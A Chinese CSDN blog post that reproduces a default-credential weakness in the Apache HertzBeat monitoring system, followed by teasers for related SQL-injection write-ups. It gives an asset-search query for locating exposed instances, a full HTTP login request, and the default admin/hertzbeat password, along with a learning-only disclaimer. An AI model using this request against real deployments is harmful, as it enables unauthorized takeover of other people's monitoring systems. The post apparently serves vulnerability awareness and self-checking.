【漏洞复现】|Apache-HertzBeat开源实时监控系统存在默认口令

于 2024-12-07 19:46:47 发布
阅读量521 收藏 4
点赞数 3
分类专栏: 漏洞复现 文章标签: apache web安全 复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IDHALASHAO/article/details/144315320
版权

漏洞描述

HertzBeat(赫兹跳动) 是一个开源实时监控系统,无需Agent,性能集群,兼容Prometheus,自定义监控和状态页构建能力。HertzBeat 的强大自定义,多类型支持,高性能,易扩展,希望能帮助用户快速构建自有监控系统。具有无代理、性能集群、兼容 prometheus、自定义监控和状态页面构建功能。HertzBeat(赫兹跳动) 开源实时监控系统存在默认口令漏洞。

资产概要  

app="HertzBeat-实时监控系统"

漏洞复现  

POST /api/account/auth/form HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 56

{"type":0,"identifier":"admin","credential":"hertzbeat"}
默认账号密码 admin/hertzbeat

免责声明  

本文分享的漏洞POC及相关技术仅限学习和自查用途,请勿用于非法测试或其他不当行为。传播或利用本文及相关工具所导致的任何直接或间接后果,包括法律责任和不良影响,均由使用者自行承担,文章作者概不负责。如内容涉及侵权问题,请及时联系,作者将迅速处理并致以歉意。此外,工具来源于网络,安全性需用户自行验证。感谢您的理解与支持!  

YourPHPCMS checkEmail SQL注入漏洞复现
iSee857的博客
12-04 400
​ YourPHPCMScheckEmail接口处存在SQL注入漏洞,未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。
HertzBeat、zabbix、Prometheus比较
最新发布
不务正业的猿
04-29 145
• 关系型数据库存储:默认使用MySQL/PostgreSQL,数据量大时性能受限,后期支持TimescaleDB优化时序存储。三者可组合使用,例如用Prometheus监控K8s集群,HertzBeat管理数据库和中间件,Zabbix监控物理网络设备。• 模块化设计:采用Java开发,支持微服务集群扩展,默认使用H2数据库(可切换MySQL/TDengine)。• 拉取模型+TSDB:通过Pull模式采集数据,自带高性能时序数据库,支持动态服务发现。必选Prometheus,生态完善且专为容器设计。
漏洞复现|致翔OA系统接口open_juese SQL注入漏洞
摘星怪sec的blog
11-24 406
致翔科技由广州致翔计算机科技有限公司和深圳分公司以及各地还有多家办事处组成,是以IT软件技术和管理不断创新为核心的客户需求导向型的高新技术和双软认证软件技术公司。
YourPHPCMS checkEmail接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
12-04 299
Yourphp企业网站管理系统是一款完全开源免费的PHP+MYSQL系统。其checkEmail接口存在SQL注入漏洞,未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。
Yourphp系统发生错误
lxw1844912514的博客
10-19 821
今天早用YP更新缓存,弹出如下错误: 随之而来的是错误信息是: [php] view plain copy [14-12-0310:48:12]E:\wwwweb\xmwszt360\Core\Lib\Driver\Db\DbMysql.class.php(320)trace(Table'xmesmweb.yb_index'doesn'texist ...
Apache-HertzBeat开源实时监控系统存在默认口令漏洞
缘梦未来的博客
12-02 851
HertzBeat(赫兹跳动) 是一个开源实时监控系统,无需Agent,性能集群,兼容Prometheus,自定义监控和状态页构建能力。HertzBeat 的强大自定义,多类型支持,高性能,易扩展,希望能帮助用户快速构建自有监控系统
Apache-HertzBeat 开源监控默认口令登录
iSee857的博客
12-06 725
HertzBeat(赫兹跳动) 开源实时监控系统存在默认口令漏洞。导致攻击者可利用默认用户名密码进行登录从而实现系统接管
致翔OA msglog.aspx SQL注入漏洞
尘埃的博客
10-27 1025
致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。
0day PHPCMS演示站index存在SQL注入漏洞
ZeroDay001的博客
11-19 337
PHPCMS演示站通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统inquiry存在SQL注入漏洞
致翔OA漏洞学习——msglog.aspx SQL注入漏洞
记录并分享学习安全的知识点..
05-02 3056
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述 致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。注:注入参数为user。
PHPCMS注册邮箱处SQL注入的修复分析
qq_63217130的博客
01-23 638
再看到他使用call_user_func()方法 对应调用的是 $controlle类r的public_checkemail_ajax方法。因此即使出现了 % 也是不行的(之前的sql注入就是利用url编码 绕过addslasher,如果email里面有%27则会报错 )此外因为最新版本在sql执⾏之前进⾏预编译了 也就是说如果解密后发现有引号之类的仍会加上反斜杠。parm构造类里面调用了addslasher即 对' ''加上反斜杠。然后看看这个类的构造函数 这里主要看看parm类的构造函数。
致翔OA漏洞复现手册
1stPeak's Blog
04-21 3916
前言:致翔OA产品漏洞复现笔记,供自己使用,不定期更新 声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。
『PHP代码审计』OURPHP3.2.0.0222存在SQL注入漏洞
Ho1aAs‘s Blog
06-10 500
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 访问后台的内容——文章管理——添加信息 抓包 POST /client/manage/ourphp_article.php?ourphp_cms=add HTTP/1.1 Host: 192.168.5.103 Content-Length: 269 Cache-Control: max-age=0 Upgrade-Insecure-R
5个其他PHP安全漏洞
culi3118的博客
08-12 246
In a previous article, I talked about some common security vulnerabilities that can affect your PHP web application. But there are other things besides those ten (okay, seven) attacks to think about w...
这你不是你所常见的PHP文件包含漏洞(利用phpinfo)
Adminxe的博客
05-03 1521
0x01 前言 看到文件包含(+phpinfo ) 的问题,在上次众测中出现此题目,如果没打过CTF,可能真的很少见到这种问题,当然作为小白的我,也是很少遇到,毕竟都是第一次,那就来总结一波经验和操作,附赠EXP,借鉴网上大佬环境,进一步进行探索。 0x02 漏洞环境 执行如下命令启动环境: docker-compose up -d 目标环境是官方最新版PHP7.2,说明该漏洞与P...
极简开源监控报警中间件HertzBeat(赫兹跳动)测试使用
zhutoushaonain的博客
11-30 3781
HertzBeat赫兹跳动 | HertzBeat易用友好的开源实时监控告警系统,无需Agent,高性能集群,强大自定义监控能力。懒得搬,去官网看详细介绍。关键一点就是无需AgentHertzBeat 的原理就是使用不同的协议去直连对端系统,采集 PULL 的形式去拉取采集数据,无需用户在对端主机上部署安装 Agent | Exporter等。比如监控 linux, 在 HertzBeat 端输入IP端口账户密码或密钥即可。
致翔软件致翔OA-open_juese存在SQL注入漏洞
缘梦未来的博客
11-05 1052
致翔软件的致翔OA是一款企业级的办公自动化系统,旨在提升组织内部的沟通与协作效率。该系统集成了文档管理、流程审批、日程安排、任务管理等多种功能,帮助企业实现无纸化办公和信息流转的高效化。用户可以通过简洁的界面快速访问所需功能,支持移动办公,便于随时随地处理工作事务。此外,系统还提供了数据分析和报告功能,助力企业决策
开源系统监控工具HertzBeat
xuweilin的博客
08-26 981
Apache HertzBeat 是一个功能强大、易于使用、高度可定制的监控系统,无论是小型项目还是大型企业级应用,都能提供全面的监控解决方案。其无代理、高性能集群、Prometheus 兼容和自定义监控等特点,使其在监控领域具有独特的优势。如果您正在寻找一个高效、灵活的监控工具,HertzBeat 无疑是您的理想选择。t=N7T8。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值